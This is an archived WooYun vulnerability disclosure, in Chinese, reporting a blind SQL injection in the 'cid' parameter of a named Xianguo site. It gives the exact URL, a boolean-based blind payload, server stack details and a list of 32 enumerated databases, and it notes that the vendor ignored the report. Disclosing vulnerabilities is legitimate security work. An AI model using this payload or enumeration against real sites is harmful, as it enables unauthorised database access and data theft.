乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-15: 细节已通知厂商并且等待厂商处理中 2016-01-20: 厂商已经主动忽略漏洞,细节向公众公开
鲜果网某站点存在SQL注入漏洞
目标:鲜果网某站点
http://m3.xianguo.com/homeindex/list?cid=3&tagid=186_31
注入点:cid
---Parameter: cid (GET) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: cid=(SELECT (CASE WHEN (1567=1567) THEN 1567ELSE 1567*(SELECT 1567 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&tagid=186_31---web server operating system: Linux Ubuntuweb application technology: PHP 5.5.9back-end DBMS: MySQL 5.0
available databases [32]:[*] analytic[*] bang[*] book_new[*] book_novel[*] books[*] client[*] digital_market[*] feed[*] gdcnc[*] groups[*] igoli[*] information_schema[*] life_stream[*] life_stream_doings[*] life_stream_doings_meta[*] life_stream_follow[*] life_stream_link[*] life_stream_publicline[*] metadata[*] mysql[*] novel_spider[*] partner[*] recommend[*] remark[*] samsung[*] short_url[*] snslog[*] spider[*] taggroup[*] test[*] user[*] wordpress
到此为止,请尽快修复~
过滤~
危害等级:无影响厂商忽略
忽略时间:2016-01-20 21:30
漏洞Rank:4 (WooYun评价)
暂无